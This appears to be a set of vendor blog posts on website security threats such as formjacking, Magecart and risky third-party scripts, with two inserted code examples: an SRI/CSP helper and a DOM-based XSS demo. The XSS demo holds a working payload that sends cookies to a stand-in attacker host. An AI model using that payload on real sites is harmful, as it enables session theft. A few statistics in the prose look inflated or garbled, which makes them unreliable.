Why marketing security is your first line of defense against data leaks
Your website is one of your business’s most valuable assets. It not only provides a powerful tool for engagement with customers – and potential customers – it is a powerful marketing platform and a source of data on user behavior, preferences and Personally Identifiable Information (PII).
For a marketer, the more data you can gather on visitors to your website, the better you can craft campaigns and target individuals. Moreover, you may be entrusted with sensitive customer data such as names, addresses, credit card details, passwords and other personal information.
The massive threat of data loss
With the volume and value of customer data under the spotlight, the risk of data loss and data leaks looms large. Unfortunately, in 2019 all enterprises that collect data online are still vulnerable to cyberattack. The threat is now so prevalent that in its Global Risks Report, the World Economic Forum (WEF) recently put large scale cyberattacks as the fifth biggest threat facing our world today, ranking only three places down from climate change.
In addition, 82 percent of companies that the WEF questioned believe the risk of cyber-attacks leading to data theft and data leakage will increase in 2019.
Elsewhere, the 2019 Thales Data Threat Report – Global Edition says 60 percent of organizations globally have already experienced a data breach at some point in their history, with 30 percent experiencing a breach within the past year alone. The US had the highest number of data breaches of all breaches globally in the last three years (65 percent) as well as in the last year (36 percent).
What are the threats to your website?
While much of the current talk around the importance of cybersecurity focuses on securing the company network, some of the biggest breaches in recent years have occurred after an organization’s website was compromised, leading to valuable data being stolen. This is due, in part, to websites – and website security – falling under the remit of the marketing department rather than the IT team, while website security is not something marketing departments are tasked with solving. This is an oversight that cyber criminals can readily exploit.
It is vital that all businesses are aware of the vulnerabilities across their marketing platforms and can prevent or mitigate risk effectively.
We’ve all heard how criminals can use a device to ‘skim’ your credit card details from an ATM; formjacking is a web-based equivalent of this. Also called digital payment card skimming (DPCS), hackers inject malicious code onto a website – often through a third-party technology – and harvest customers’ financial information when they make an online purchase.
At the heart of these attacks is a consortium of hackers called Magecart, which in 2018 executed numerous high-profile attacks on the likes of Ticketmaster, along with retailers Newegg, Kitronik and VisionDirect.
The most common type of cyberattack in 2018, cryptojacking sees hackers inject browser-based cryptomining code into a website to illegally mine for cryptocurrencies. This causes significant problems for any business, as cryptojacking impacts website availability and performance, which can lead to a loss of customer conversion and revenue.
Both formjacking and cryptojacking follow a trend of web-based hacking, meaning the user no longer needs to download malicious software to be impacted by it.
Third-party entry system
For a marketer, third-party tags or code like social media buttons, ad trackers and chatbots are useful for improving and tracking the customer experience, but they can also throw a wide door open to cyberattacks and data leaks.
Fallout of a data breach
At the same time, regulatory pressure and financial penalties are increasing for data loss. The post data-breach fallout may also include business disruption, class-action lawsuits, executive firings, reputational damage and diminished market value of the organization.
However, compliance rates for Payment Card Industry Data Security Standard (PCI DSS) – the standard for organizations that handle branded credit cards – are falling. Verizon’s 2018 Payment Security Report reveals that almost half of organizations assessed were not fully compliant, and that the average number of controls failed rose to the highest level seen since 2012.
What can I do to secure my website from hackers and data leaks?
Ensighten’s website security solution (MarSec) offers real-time control of business and customer data on your website or web properties and apps, to prevent leakages of data and PII. It enables your company to cut through the confusion of third-party suppliers and gain insight into who has access to what customer data. MarSec also ensures that data stays private, secure and that governance is enforced, preventing exposure and risk.
Website Security offers:
Third-party technology control: Whitelist only approved vendors to operate, as well as help manage and update policies in real time
Data Masking and redaction: Mask or redact sensitive data strings
Client-side security control: Extends protection beyond the company network to potential vulnerable areas that can be overlooked
Why the long-term effects of a data breach on your business can be catastrophic
Billions of personal records are lost or stolen every year, either through cyberattack or simple data mismanagement. In 2018 some of the biggest names in government, technology, healthcare, travel and hospitality suffered data losses.
At the same time, data privacy has never been more important; companies are now subject to intense scrutiny from regulators as to how they handle, store and secure their customers’ personally identifiable information (PII) and data.
The most recent Cost of a Data Breach Study by The Ponemon Institute shows that the cost of a data breach is snowballing, with more records being lost or stolen every year. Here are the stats:
Average total cost of a data breach: $3.86 million
Average total one-year cost increase: 6.4 percent
Average cost per lost or stolen record: $148
One-year increase in per capita cost: 4.8 percent
Likelihood of a recurring material breach over the next two years: 27.9 percent
Average cost savings with an Incident Response team: $14 per record
How can you work out the cost of a data breach?
The cost of a data breach covers detection, escalation, notification, and any activities an organization must undertake following an incident, including working to repair their reputation. Here are the most common outlays following a breach.
Detection and escalation of a data breach
This is the cost incurred at ground zero – as soon as a breach is detected. Once an organization detects a breach or loss of data, it must report it within a specified time-frame.
For this they may need to implement forensic and investigative activities, assessment and audit services, crisis-team management, as well as communicating the problem to management and the board of directors.
The problem is that data loss can remain undetected for months after the original attack. The Ponemon study shows that the average time taken to identify a breach was 197 days in 2018, and the average time to contain it was 69 days.
However, it can take much longer to locate a data leak – last month it came to light that 42,000 patients in Florida had their personal and health information exposed in a breach that lasted 16 months.
Post data breach response
These are the costs associated with communicating with individuals affected by the data leak, as well as costs associated with reparation with customers and regulators.
For example, any help desk activities or inbound communications, credit report monitoring and identity protection services, as well as issuing new accounts or credit cards, legal expenses and regulatory fines. (This can come in the form of subsequent legal action – see the Wendy’s data breach, below.)
Post-breach, organizations must notify the individuals who had their data compromised via email, letters, outbound telephone calls, or by general notice. They also need to communicate with regulators and perhaps engage outside experts.
It is vital that organizations get this right. Under GDPR, organizations have 72 hours to disclose any data breaches to the relevant authorities, as well as the victim of the breach. The penalty for failing to notify them is €10 million, or two percent of revenues.
In addition to these initial expenses, some of the most dramatic long-term ramifications of a data breach or data leak occur in the weeks, months and even years following an incident.
Lost business following a data leak
Initial costs of lost business might include business disruption and system downtime. However, data breaches will also result in the long-term loss of customers, reputation and goodwill. Forty-one percent of British consumers and 21 percent of US consumers said they will stop spending with a business or brand forever following a data security breach. This type of reputation damage can be difficult to repair.
Ponemon says that organizations that lost less than one percent of their customers due to a data breach saw an average loss of $2.8 million in 2018. If four percent or more was lost, the average loss was $6 million, a difference of $3.2 million.
Data loss also means organizations leave themselves open to legal action. Wendy’s recently settled a $50 million lawsuit after cybercriminals targeted 1,025 of its point-of-sale systems with malware, leading to the loss of massive quantities of payment card data. After a consumer class-action lawsuit which it settled for $3.4 million, Wendy’s agreed to pay out $50 million to compensate affected card issuers for breach-related losses and expenses, such as the cost of reissuing cards and compensating cardholders for fraud losses.
Regulatory penalties following data breaches
Under GDPR, organizations can be fined up to four percent of annual global turnover or €20 million, whichever is greater, if they fail to comply with the regulation.
In the US there are also efforts to introduce data privacy regulations at state level – with the likes of the California Consumer Privacy Act (CCPA) – and at federal level with the US Senate examining how lawmakers can protect consumer privacy.
In real terms, a company can lose value following a data breach. A multi-year study by Comparitech published in 2018 shows that data breaches have an impact on a company’s share price. The study’s authors said that the impact of data breaches “likely diminished over time, but the damage was still visible in the stock’s NASDAQ performance indicator even after three years, in some cases”. The following impacts were recorded.
Share prices of breached companies hit a low point approximately 14 market days following a breach
Finance and payment companies saw the largest drop in share price performance following a breach
Breaches that leak highly sensitive information like credit card information and social security numbers see larger drops in share price performance on average than companies that leak less sensitive info
Third-party problem in data breaches
A reported 59 percent of companies say they have experienced a data breach caused by one of their vendors or third parties. More worryingly, many of these types of breaches go undetected: 22 percent of respondents to a late 2018 survey by Opus and Ponemon admitted they didn’t know if they’d had a third-party data breach in the past 12 months.
Furthermore, only 37 percent indicate they have sufficient resources to manage third-party relationships and only 35 percent rate their third-party risk management program as highly effective.
Considering the wide ecosystem of third-party vendors in today’s modern IT environment – particularly those with access to vital business resources like the company website – organizations must have a complete view of which third parties have access to what sensitive data, and how they are using it. Having a formal monitoring and tracking process in place for third parties will protect against potential data leakage and help defend your organization from a costly data breach incident.
How to guard against data breaches
The fact is that no organization that suffers a data breach will escape without either serious long-term financial or reputational damage.
It is therefore impossible to overestimate the importance of securing data, be it corporate or personal, for which you are liable – the potential short and long-term damage you can suffer otherwise is almost incalculable.
Importantly, there is a direct correlation between how quickly an organization can identify and contain data breach incidents and the severity of the financial consequences – companies that contained a breach in less than 30 days saved more than $1 million versus those that took longer.
When it comes to data leaks, prevention is better than a cure; investing in a comprehensive data privacy solution now could save your company millions in lost business and regulatory penalties. Speak to Ensighten about how to gain an insight to your data, any third party vulnerabilities or potential breaches to ensure you maintain regulatory compliance and keep your business up and running.
With all the hype around artificial intelligence (AI), should there be more focus on getting the fundamentals of security right first?
There’s no escaping the buzz around artificial intelligence (AI). Along with other emerging technologies such as machine learning (ML) and Robotic Process Automation (RPA), it is being touted as a game-changer for businesses.
AI is increasingly present in devices, applications and services throughout any organization with a digital offering. But nowhere has AI’s potential for disruption been more evident than in cybersecurity, with the technology quickly gaining traction within enterprise businesses – particularly around automated threat prevention, detection and response.
It is an increasingly popular option as it enables businesses to be more proactive in their defence strategies and detect more threats before they can do serious damage to their organization or their web security. One study published in January 2019 shows that 86 percent of businesses have explored Machine Learning and Artificial Intelligence solutions, with almost half (48 percent) pointing to quicker response times and better web security as their primary drivers.
Fighting fire with fire
Nevertheless, for every company leveraging AI cybersecurity within their website security strategy, you can be certain that criminals will be using that same technology to launch increasingly sophisticated attacks of their own.
Criminals can leverage AI to:
Automate attacks and improve evasion capabilities against detection systems
Increase the scale and reach of the threats
Improve current digital attack tools to make them more harmful and difficult to detect
Automatically breach defences and generate more sophisticated phishing attacks from information scraped from websites
According to a recent report by Riot Research, “an arms race will develop around Artificial Intelligence and Machine Learning as major cybercriminal gangs and rogue nation states adopt these to launch increasingly sophisticated cyberattacks, pushing spending on countermeasures.”
No magic bullet
CIOs questioned for Gartner’s 2019 CIO Agenda predicted AI would be the most disruptive technology for their businesses. Thirty-seven percent responded that they have already deployed AI technology or that deployment was in short-term planning. In terms of implementation, AI came in second place – behind cybersecurity.
What we can take from this is that there is great potential for the application of Artificial Intelligence security and other disruptive technologies within the realm of cybersecurity. But it is important to remember that these technologies don’t work in isolation, and they are not a ‘magic bullet’ for your cybersecurity needs.
Multi-layered approach to website and data security
Next-generation technologies such as AI should be implemented in tandem with other website security solutions, because, while cyberattacks today are increasingly complex and targeted, it is still important that organizations don’t overlook some of the most common attack vectors.
Many of these attacks on websites take advantage of third-party technologies which run on the sites, providing a backdoor, through which criminals can access your customers’ personal and payment data. Even with this in mind, 67 percent of organizations are yet to implement marketing security for their website, putting both their customers and the future of their business at risk.
With the many advances being made with new disruptive technologies like AI it is important to invest in getting the fundamentals right, which means including marketing security as part of your holistic approach to cyber defense. Get in contact to learn more.
With formjacking incidents on the rise, is your website leaving your customers vulnerable to data theft?
2018 saw a sharp rise in incidents of web skimming and formjacking, a method used by cybercriminals to steal visitors’ credit card details and other personal information from the payment forms on the checkout pages of e-commerce websites.
Another study, Symantec’s 2019 Internet Security Threat Report, shows that 4,818 unique websites were compromised via formjacking code every month in 2018. The appeal of formjacking for criminals is linked to the value of customers’ credit card information – data from a single credit card can be worth up to $45 (£34) on underground markets. Just 10 credit cards stolen from compromised websites could result in a yield of up to $2.2 million (£1.66 million) for cybercriminals each month.
Most wanted: What is Magecart?
At the forefront of these campaigns is a consortium of hackers called Magecart. In 2018 the group executed formjacking-based attacks on several high-profile victims including Ticketmaster, as well as retailers Newegg, Kitronik and VisionDirect.
RiskIQ, which has led the research into Magecart’s activities, says the group is placing digital credit card skimmers on compromised e-commerce sites “at an unprecedented rate and with frightening success.”
In a typical data breach, criminals break into company servers and access databases to steal confidential corporate and employee information that can include passwords, email addresses, phone numbers, and maybe even financial information and intellectual property. This is done by exploiting flaws in website security measures.
But, under the Payment Card Industry’s Data Security Standard (PCI DSS), merchants are prevented from storing full payment card information, such as the CVV security code. What makes Magecart’s attacks so dangerous is that it doesn’t matter that a company hasn’t stored your credit card details. Its malicious script lurks on the client-facing side of a company’s website, waiting to skim off any personal information, like a CVV code, that’s entered by customers when they check out. This is also known as a data leak, as the hackers are stealing the information as it is entered, rather than from the business’s servers.
Supply chain attacks
RiskIQ notes that the ‘Global Attack Surface’ is growing every day. For example, modern websites are made up of many different elements – the underlying operating system, frameworks, third-party applications, plug-ins, trackers – all designed to deliver the user experience that people have come to expect, as well as reduce the time to market and derive maximum value from user interactions.
However, this commonality of approach is attractive to criminals as a successful exploit written for a vulnerability or exposure on one site can be reused across many sites, creating a threat to multiple website security measures.
In numerous cases, Magecart has targeted third-party website vendors used in the supply chain in order to inject its code onto websites. In the case of Ticketmaster, Magecart compromised a third-party chatbot, which loaded malicious code into the web browsers of visitors to Ticketmaster’s website, with the aim of harvesting customers’ payment data.
In addition, code supplied by third-party vendors integrates with thousands of websites, so when it’s compromised, the websites of all of the customers that use it are compromised, giving Magecart access to a wide range of victims at once.
Secure your website
This growing attack surface means that while cybersecurity solutions are often deployed on an organization’s networks or servers, its website is highly susceptible to attack. As a unique point of vulnerability for customers inputting credit card data at the source, it shouldn’t be overlooked.
Formjacking, or web skimming, is on the rise, so it is crucial that you ensure your website is secure. As well as observing and monitoring site traffic and testing any new updates to detect any suspicious behaviour, a key part of website security is mitigating any threat from third-party vendors by creating a whitelist or blacklist that ensures you only share data with trusted vendors.
Don’t risk becoming Magecart’s next victim. Speak to Ensighten about how our marketing security solution will enable you to manage all your third-party vendor technologies and prevent unauthorized data collection.
Ensighten will be highlighting the importance of web security at the world’s biggest InfoSec event, RSA Conference 2019
In 2019, there’s not a department or function within an organization that isn’t shaped in some way by the need for cybersecurity. Barely a week passes when we don’t hear of another high-profile company or government agency that has fallen victim to cybercrime – whether it’s a ransomware attack, phishing campaign, cryptojacking, or any number of sophisticated new threats waiting to be unleashed on the enterprise and undermine its website security.
Companies are waking up to the long-term financial and reputational damage that a cyberattack can inflict. Conversations about website security can be heard throughout every aspect of the enterprise – including the boardroom where business leaders are giving the green light to greater IT security spending in line with the perceived risks associated with data loss. New research claims the $162 billion (£123 billion) spent on cybersecurity in 2018 will jump by an astounding $1,105 billion (£837 billion) during 2019, driven by adherence to GDPR and other data privacy regulations such as CCPA, which is due to come into action in January 2020.
Due to this heightened awareness around cybersecurity, the RSA Conference 2019 in San Francisco has never been more relevant to the modern enterprise. As the world’s biggest information security (InfoSec) event, it draws more than 50,000 attendees per year, providing a platform for both cybersecurity leaders and new industry voices, advocating for next generation technologies that can go toe-to-toe with today’s increasingly complex cybercrime threats.
Ensighten will be one of those voices at RSA Conference, showcasing the need for next generation website security for the enterprise. The last 12 months have seen several high-profile incidents where global organizations’ websites were targeted by cybercriminals, including The Make-a-Wish Foundation, Ticketmaster, ABS-CBN and Newegg.
Website security: Why is it so important?
Website breaches can be disastrous for any organization, and can even prove terminal if customers’ credit card, passport or other Personally Identifiable Information (PII) is stolen. Not only do they face public scrutiny and potentially huge fines imposed by the appropriate regulatory bodies, but they may take a bigger hit if confronted by unhappy investors, decreasing market value or desertion by customers who can no longer trust them to keep their personal information secure.
Despite this, our own research indicates that only 30 percent of enterprises are completely prepared in the event of a website breach. In many instances, organizations may not even be aware of the threat posed, as hackers use third-party vendors to gain entry to their websites. It is imperative to us that organizations understand the enormous risks they are taking with their business and their reputation if they aren’t taking every precaution to secure their website supply chain.
Ensighten at the RSA Conference 2019
At the RSA Conference we will be demonstrating our leading website security solution which protects businesses against malicious attacks and data loss.
Alongside this, we know that marketing security is also still slipping under some organizations’ radar. We will be talking to InfoSec professionals about why it is essential to stop criminals getting their hands on all the customer data that their businesses acquire for campaigns and other marketing projects. Further, we will be presenting our MarSec platform, which manages and controls both the enterprise and customers’ data on a website in real-time to prevent data leaks and loss of PII.
The theme of this year’s RSA Conference is ‘Better’. It implores everyone “from the C suite to those of us on the front lines” to do better when it comes to creating a better, more secure world. That’s exactly our goal with our next-generation website security solution.
As RSA explains: “We come here to experience better solutions, brainstorm better ideas, and remind ourselves that a better, safer world is ahead.” Ian Wooley, CRO, Ensighten.
In this current era of digital transformation, your website as a digital platform has never been more important to your business. Websites are evolving to offer cross-channel, personalized and user-centric web experiences to match increasingly high customer expectations.
Yet despite significant investment from companies into getting the look, feel, and user experience right on their websites, many fail to address perhaps the most important aspect: website security.
It seems incongruous that despite being a highly-valued entry point for customer interaction and a repository for a wealth of personal and financial customer data, the front end – or the client-side – is considered the most vulnerable part of a website. As such, it is often targeted by hackers looking to steal valuable customer data.
There have been some high-profile examples of this type of cybercrime, most notably the use of ‘skimming code’ – otherwise known as digital payment card skimming (DPCS) or formjacking – by criminals to scrape website users’ credit card details and other information from payment forms when they are completing an online purchase. They will then use those stolen details to perform payment card fraud or sell them to other criminals on the dark web.
Pertinently, PCI compliance prevents merchants from storing customers’ three-digit credit card security code on a website’s servers, so it makes sense for hackers to focus their efforts on the client-side of the website, to capture those details as they are entered.
The most notable attacks of this kind have been carried out by a collection of cybercrime groups known as Magecart, who were reportedly responsible for at least 319,000 cyber incidents in 2018. For example, Magecart targeted online retailer Newegg by injecting 15 lines of skimming code on its payments page, which remained undetected for more than a month during the summer of 2018. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name. The server even reportedly used an HTTPS certificate to avoid suspicion.
The group exploited another client-side website security vulnerability in its 2018 attack on Ticketmaster UK, compromising a chatbot originating from a third-party customer support company. While third-party vendors like social media buttons, ad trackers and chatbots increase the functionality of your website and improve the customer experience, they can also be a security blind spot if you do not have the correct cyber security measures in place.
This is compounded by the fact that malicious changes to the code base can occur entirely without your knowledge, unsurprisingly leading to a massive gap in your cyber security measures. Indeed, Ponemon research shows 59 percent of companies say they have experienced a data breach caused by one of their third parties.
But it’s not just enterprises that need to worry about web security. Governments have a duty to make their webpages accessible to everyone, and as part of this, use plug-ins to read text on the site out loud to blind or partially sighted visitors. One such plug-in, called Browsealoud from Texthelp, was compromised by hackers who altered its source code to inject cryptomining code into every webpage, affecting more than 4,000 government websites around the world.
What can I do to secure my website?
There are products available that can help defend your website from client side attacks – to an extent. A Content Security Policy (CSP) can help prevent cross-site scripting (XSS), clickjacking and other code injection attacks, but there are still gaps in its capabilities, and it can often mean a trade-off between website security and functionality.
In addition, Subresource Integrity (SRI) can check for any code changes in any assets served by a third-party vendor to ensure they haven’t been compromised. However, SRI can struggle to keep up with the regular updates from third-party vendors and frequent changes to source code. The bottom line is that neither is fully effective against attacks in a rapidly evolving threat landscape. Download our guide to learn more.
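To make the two browser-side controls described above concrete, here is an added example (not Ensighten’s code and not taken from the original post) that computes an SRI integrity value for a vendor script, checks a later copy of that script against it, and builds a Content Security Policy header that only permits scripts from explicitly approved hosts. The script bodies, hostnames and report URI are constructed for illustration; the CSP matcher is deliberately simplified (exact host entries and 'self' only, no wildcards, nonces or scheme sources), which is one reason real deployments lean on the browser’s own enforcement rather than a parser like this.

```python
"""Added example: SRI hash generation/verification and a CSP allowlist builder.
Not Ensighten's code; sample inputs below are constructed for illustration."""
import base64
import hashlib
import hmac
from urllib.parse import urlparse

# Digest algorithms the SRI specification accepts in the integrity attribute.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")

# Constructed sample: the vendor script body as it was when the page was built.
VENDOR_SCRIPT_V1 = b"window.chatWidget = { init: function () { /* render widget */ } };\n"
# Constructed sample: a later copy of the same URL with one line appended (any change
# at all, including a legitimate vendor update, produces a different digest).
VENDOR_SCRIPT_MODIFIED = VENDOR_SCRIPT_V1 + b"/* one extra line added after the page shipped */\n"


def sri_hash(body: bytes, algorithm: str = "sha384") -> str:
    """Return the integrity attribute value for `body`: '<algorithm>-<base64 digest>'."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"SRI does not support {algorithm!r}")
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the <script> tag a site would publish; crossorigin is required for SRI on cross-origin URLs."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def sri_matches(body: bytes, integrity: str) -> bool:
    """Check a fetched body against an integrity attribute, as a browser does before executing it.
    The attribute may hold several space-separated tokens; this simplification accepts the body
    if any token with a supported algorithm matches."""
    for token in integrity.split():
        algorithm, _, _ = token.partition("-")
        if algorithm in SRI_ALGORITHMS and hmac.compare_digest(sri_hash(body, algorithm), token):
            return True
    return False


def build_csp(approved_script_hosts, report_uri=None) -> str:
    """Build a Content-Security-Policy header value: scripts and XHR/fetch only from the page's own
    origin plus explicitly approved vendor hosts, forms may only post back to the site itself."""
    sources = " ".join(["'self'", *approved_script_hosts])
    directives = [
        "default-src 'self'",
        f"script-src {sources}",
        f"connect-src {sources}",
        "form-action 'self'",
        "object-src 'none'",
        "base-uri 'self'",
    ]
    if report_uri:
        directives.append(f"report-uri {report_uri}")  # violation reports reveal unexpected loads
    return "; ".join(directives)


def csp_allows_script(csp: str, url: str, page_origin: str) -> bool:
    """Simplified check of whether script-src (falling back to default-src) permits loading `url`
    on a page served from `page_origin`. Supports 'self' and exact host entries only."""
    directives = {}
    for part in csp.split(";"):
        name, _, value = part.strip().partition(" ")
        if name:
            directives[name] = value.split()
    sources = directives.get("script-src", directives.get("default-src", ["'none'"]))
    host = urlparse(url).netloc
    if "'self'" in sources and urlparse(page_origin).netloc == host:
        return True
    return host in sources


if __name__ == "__main__":
    tag = script_tag("https://chat.example-vendor.com/widget.js", VENDOR_SCRIPT_V1)
    print(tag)
    print("unchanged copy accepted:", sri_matches(VENDOR_SCRIPT_V1, sri_hash(VENDOR_SCRIPT_V1)))
    print("modified copy accepted:", sri_matches(VENDOR_SCRIPT_MODIFIED, sri_hash(VENDOR_SCRIPT_V1)))
    policy = build_csp(["chat.example-vendor.com"], report_uri="/csp-report")
    print("Content-Security-Policy:", policy)
    print("unapproved host allowed:",
          csp_allows_script(policy, "https://unapproved.example.net/other.js", "https://shop.example.com"))
```

The SRI check fails closed on any byte change, which is exactly the trade-off the paragraph above describes: a vendor shipping a routine update invalidates the pinned hash until the site republishes the tag. The CSP builder shows the allowlist idea behind the vendor-control approach: a script host that is not named in script-src is refused by the browser, and with report-uri set those refusals surface as violation reports a security team can monitor.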
You need next generation website security to ensure your data security is working and your business is safe. Ensighten can help you protect any and all client-side data against all the threats we’ve discussed. Our MarSec solution provides you with a real-time view of all the technologies running on your website and performs a full privacy risk assessment as web pages are loaded. It can also prevent malicious web injects by only loading resources that are explicitly whitelisted, and blocking everything else.
As we’ve seen with just these few examples of client-side attacks, you can no longer overlook or dismiss the potential vulnerabilities within your website. The time to secure your website and your customer data is now.
A home to hackers, the dark web means it has never been easier to target personal and customer data
2018 saw criminals once again target organizations – of all sizes, and across industries and market sectors – with a series of cyberattacks that continues to escalate in complexity, scale and frequency. Many of these attacks were launched with one goal in mind: stealing data.
Data is a valuable, and much sought-after, currency in today’s digital world. Whether it’s confidential company information like banking details, employee records, Intellectual Property (IP) documents, or the credit card details, logins or Personally Identifiable Information (PII) of customers, all stolen data has a value to the thieves, which is why data protection should be a top priority for any business.
The dark corner of the internet – what is the dark web?
The increase in data theft is fuelled, in no small part, by the dark web. Where criminals would once fence their stolen goods via a network of shady contacts, this dark corner of the internet does much the same job. Operating under the anonymity afforded by trading in cryptocurrencies, the dark web is where data is bought and sold for a price. The dark web is often confused with the deep web, however the two are different. The deep web refers to the entire internet – most of which is not indexed and therefore won’t appear on search engines. The dark web specifically refers to the criminal activity taking place on this unindexed portion of the internet.
The data varies in value. Personal information that cannot be changed as easily as a credit card or bank account number, such as a social security number or a medical record, is reportedly the most valuable to cybercriminals and commands a high price on the dark web.
However, the dark web isn’t just a place to buy or sell stolen data; it also promotes and enables cyberattacks by making hacking tools easily and cheaply available to anyone with a laptop, making it a threat to all web security. 2018 research by Virtual Private Network (VPN) comparison service Top10VPN.com, showed that fraudsters can access hacking tools on the dark web for the cost of a cheap takeaway coffee.
Entry-level hacking tools, such as ready-made phishing pages, software to compromise Wi-Fi networks and files to help crack passwords, all go for less than $3.95 (£3) on the dark web. But even comprehensive hacking toolkits can be picked up for around $130 (£99), according to the research.
Coupled with the availability of how-to guides on the dark web – meaning rookie hackers need no prior knowledge of web security or of how to carry out attacks – the report notes that there’s a “real concern that online fraud could be becoming more commonplace.”
“The perception that hacks are purely the territory of techy bedroom warriors or organizations like Anonymous is increasingly a thing of the past – and all consumers need to be aware of that,” it explains.
Hacking for beginners
Many experts believe this situation will only get worse. Individuals won’t need to belong to an established criminal operation like Magecart, the umbrella name for the groups responsible for stealing customer data from Ticketmaster UK last year among other high-profile breaches, to be able to launch a successful attack on an organization by exploiting flaws in its web security.
As we’ve seen from the headlines, the fallout of a data breach can be devastating. While it varies considerably based on things like location, industry, compliance considerations, third-party involvement, insurance protection, etc., the 2018 Cost of Data Breach Study from the Ponemon Institute, sponsored by IBM, puts the average cost of a data breach in the United States at $7.91 million (£6.1 million).
Some more shocking statistics: the average time to identify a breach was 197 days, and the average time to contain a breach once identified was 69 days. However, companies that contained a breach in less than 30 days saved over $1 million (£760,000) compared with those that took longer.
Protect your website
One area of the business that’s frequently targeted by hackers is the company website, often a goldmine of customer data. The good news is, there are several ways to safeguard this data and prevent a breach.
One vulnerability often exploited by groups like Magecart stems from the third-party vendors running on your website, which hackers can use as an entry point to your organization, compromising your website security. MarSec can help you manage third-party technologies by whitelisting approved vendors and managing and updating policies in real time.
With the dark web’s law of supply and demand powering cybercrime from behind the scenes, it has never been more important to ensure your organization is protected from a crippling data breach.
Attacks on web applications account for 40 percent of cyberattacks – how secure is your website?
Your website is one of your most valuable assets. For your customers it can act as a shop window to your products and services, a source of valuable company information, or a full retail trading platform.
For your organization, your website is invaluable for generating new business and providing insight into visitor behavior and preferences. However, this also makes your website a prime target for attack by cybercriminals looking to harvest company and customer data. In this post we’ll explain what website security is, why it is so important and how you can go about ensuring your site is protected.
What is website security?
Website security is the practice of protecting your site, and the visitor data it handles, against the attacks criminals use to compromise it. There are several common attack methods that criminals employ when targeting company websites.
One method is to leverage third-party technologies to sneak in ‘the back door’ to your website. These services add value for visitors in the form of live chat bots, social media buttons or advertisements. The problem is that third-party vendors can change their scripts at any time without any approval from you, because the script is fetched from the vendor’s servers each time a page loads. That creates a security blind spot which hackers can exploit, while your security and IT teams may be completely unaware of the problem.
Attacks can also be carried out by modifying the DOM in the visitor’s browser. With the vulnerability in client-side code rather than server-side, this type of attack is harder to detect: the malicious payload runs in the browser and the server never sees it.
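A concrete instance of such a client-side attack, as an added example that is not part of the original post: a DOM-based XSS bug in which the payload travels in the URL fragment. Browsers never send the fragment to the server, so no server-side log, WAF or filter sees it. The page name, attacker host and attack URL are constructed; the functions are plain string builders so the example runs under Node, standing in for `element.innerHTML = ...` (vulnerable) and `element.textContent = ...` (safe) in a real page.

```javascript
// Added example, not code from the page: DOM-based XSS via the URL fragment,
// vulnerable and hardened versions side by side.
// shop.example and attacker.example are constructed names.

// Read the "name" the page greets the visitor with from the fragment.
// The fragment (#...) is never sent to the server, so nothing server-side
// can log or filter what arrives here.
function readName(url) {
  const fragment = new URL(url).hash.slice(1);
  try {
    return decodeURIComponent(fragment) || "guest";
  } catch (e) {
    return "guest"; // malformed %-sequence: fall back rather than throw
  }
}

// Vulnerable: untrusted text is concatenated straight into markup.
// In a real page this is `banner.innerHTML = ...`.
function renderVulnerable(url) {
  return `<h1>Welcome back, ${readName(url)}</h1>`;
}

// Hardened: encode the five characters that matter in an HTML text context
// before the value can be interpreted as markup. In a real page prefer
// `banner.textContent = name`, which needs no escaping at all.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderSafe(url) {
  return `<h1>Welcome back, ${escapeHtml(readName(url))}</h1>`;
}

// Constructed attacker link: a visitor who opens it has their cookies sent
// to the attacker, while the server only ever sees a request for /account.
const ATTACK_URL =
  "https://shop.example/account#<img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>";

function demo() {
  return {
    vulnerable: renderVulnerable(ATTACK_URL), // contains a live <img onerror=...>
    safe: renderSafe(ATTACK_URL), // the same text, rendered inert as &lt;img ...
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

The detection lesson is the one the paragraph makes: because the payload never leaves the browser, you only find this class of bug by reviewing client-side code (every sink that takes `location`, `document.referrer` or `postMessage` data into `innerHTML`, `eval` or `document.write`) or by instrumenting the page itself, not by watching server traffic.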
Here are a few examples of other automated threats to web applications:
Scraping and Data Theft: Hackers use bots to try to access restricted areas of web applications and get hold of sensitive data such as access credentials, payment information and intellectual property (IP).
Performance: Bots can impact the availability of a website, bringing it to a complete or partial denial-of-service state.
Spammers and Malware Downloaders: Targeting mobile and web applications, criminals use techniques such as spoofing their IP addresses, mimicking user behavior and abusing open-source tools to bypass CAPTCHAs, JavaScript challenges and other security heuristics.
The dangers of laissez-faire attitudes to web security
What’s worrying is an apparent lack of awareness or responsibility when it comes to cyber security, even among the most popular websites. Research by WatchGuard shows 6.8 percent of the top 100,000 websites still accept insecure SSL/TLS protocol versions, and 20.9 percent do not use web encryption at all, leaving them fully open to data interception or man-in-the-middle (MitM) attacks.
One recent example of inadequate website security is the Nova Scotia government, which has been criticised for “poor overall project management” and a “serious failure of due diligence” after a series of data breaches to one of its websites exposed 7,000 documents containing citizens’ personal information.
The information and privacy commissioner for the province has recommended that the government conduct an inventory of technology solutions, devices and applications across government, rate their vulnerabilities, and create a plan to mitigate those cybersecurity vulnerabilities.
Unfortunately, this is not an isolated incident. Our research shows that 87 percent of enterprise businesses do not review the security of their customer data, indicating an apathetic approach to website security. If exploited, this can have a serious impact on the business, as many organizations have discovered in recent years.
It doesn’t matter if the website is public sector-run, holding data such as social security numbers or medical information, or a retailer that stores their customers’ credit card or bank details – the fallout can be dramatic, and costly.
Understanding the risks of poor website security
The latest figures put the average cost of a cyberattack at more than $1 million (£780,000), an increase of 52 percent over the past year. Radware’s recently published 2018-2019 Global Application and Network Security Report says this figure takes into account operational and productivity losses combined with negative customer experience:
43 percent of firms reported negative customer experiences and reputation loss following a successful attack
37 percent suffered brand reputation loss and one in four lost customers
54 percent reported loss of productivity
Breaking these costs down further, the most common expenses following an attack or data breach include:
Direct costs: Extended labor, investigations, audits, software patches development, etc.
Prevention: Emergency response and disaster recovery plans, hardening endpoints, servers and cloud workloads
